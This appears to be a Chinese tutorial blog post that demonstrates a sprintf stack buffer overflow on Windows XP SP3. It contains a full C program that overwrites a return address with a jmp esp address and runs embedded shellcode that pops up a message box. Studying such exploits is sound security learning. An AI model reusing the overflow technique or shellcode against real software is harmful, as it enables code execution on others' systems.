sprintf缓冲区溢出

这段代码的shellcode是抄的别人的,仅仅显示出一个msgbox提醒一下。
编译器为 vc 2005
操作系统为 xp sp3
如果你的编译器或者操作系统不完全相同,有可能溢出失败
大概原理为:
  执行sprintf时,将我们构造的长字符串拷贝到堆栈区,从而覆盖了fun函数的返回地址(字符串16字节处),而此时esp正好指向字符串20字节处,因此我们将16处覆盖为jmp esp指令的地址, 将20字节处覆盖为我们的shell code。当函数fun返回时,正好将jmp esp的地址出栈,而执行了jmp esp后,正好执行到20字节处的shell code。

1
None.gif #include  < stdio.h >
 2 None.gif#include  < string .h >
 3 None.gif
 4 ExpandedBlockStart.gifContractedBlock.gif /**/ /***********************************************************************
 5InBlock.gifplease disable 缓冲区安全检查:
 6InBlock.gif    c/c++ -> 代码生成 -> 缓冲区安全检查=否(/GS-)
 7InBlock.gifplease disable 优化:
 8InBlock.gif    c/c++ -> 优化 ->优化=禁用(/Od)
 9ExpandedBlockEnd.gif************************************************************************/

10 None.gif void  fun( const   char *  input)
11 None.gif
12 ExpandedBlockStart.gifContractedBlock.gif dot.gif {
13InBlock.gif
14InBlock.gif    char buf[10];
15InBlock.gif    //_asm int 3;
16InBlock.gif    printf("My stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
17InBlock.gif    sprintf(buf,"%s",input);//这里会造成溢出
18InBlock.gif
19InBlock.gif    printf("%s\n",buf);
20InBlock.gif    //_asm int 3;
21InBlock.gif    
22InBlock.gif    printf("New stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
23ExpandedSubBlockStart.gifContractedSubBlock.gif    /**//*_asm
24InBlock.gif    {
25InBlock.gif        mov         ecx,dword ptr [ebp-4] ;
26InBlock.gif        xor         ecx,ebp;
27InBlock.gif        mov eax,0x403000;
28InBlock.gif        mov [eax],ecx;
29ExpandedSubBlockEnd.gif    }*/

30ExpandedBlockEnd.gif}

31 None.gif
32 None.gif
33 None.gif char  failwest_popup[] =
34 None.gif " \xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C "
35 None.gif " \x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53 "
36 None.gif " \x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B "
37 None.gif " \x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95 "
38 None.gif " \xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59 "
39 None.gif " \x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A "
40 None.gif " \xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75 "
41 None.gif " \xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03 "
42 None.gif " \x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB "
43 None.gif " \x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50 "
44 None.gif " \x53\xFF\x57\xFC\x53\xFF\x57\xF8 " ;
45 None.gif
46 None.gif int  main( int  argc,  char *  argv[])
47 None.gif
48 ExpandedBlockStart.gifContractedBlock.gif dot.gif {
49InBlock.gif
50InBlock.gif    printf("address of foo=%p\n",fun);
51InBlock.gif
52InBlock.gif#define N 1000
53InBlock.gif    char ss[N];//="AAAAAAAAAA";
54InBlock.gif        
55InBlock.gif    for (int i=0;i<N;i++)
56ExpandedSubBlockStart.gifContractedSubBlock.gif    dot.gif{
57InBlock.gif        ss[i]='0'+i/10;
58ExpandedSubBlockEnd.gif    }

59ExpandedSubBlockStart.gifContractedSubBlock.gif    /**//*int p=16;
60InBlock.gif    ss[p++]='2';
61InBlock.gif    ss[p++]='2';
62InBlock.gif    ss[p++]='2';
63InBlock.gif    ss[p++]='2';
64InBlock.gif    int p2=20;
65InBlock.gif    ss[p2++]='3';
66InBlock.gif    ss[p2++]='3';
67InBlock.gif    ss[p2++]='3';
68InBlock.gif    ss[p2++]='3';
69ExpandedSubBlockEnd.gif    ss[N-1]=0;*/

70InBlock.gif    strcpy(ss+16"\x12\x45\xfa\x7f"); //JMP ESP
71InBlock.gif    strcpy(ss+20, failwest_popup);
72InBlock.gif
73InBlock.gif    fun(ss);
74InBlock.gif
75InBlock.gif    return 0;
76InBlock.gif
77ExpandedBlockEnd.gif}
 
78 None.gif
79 None.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值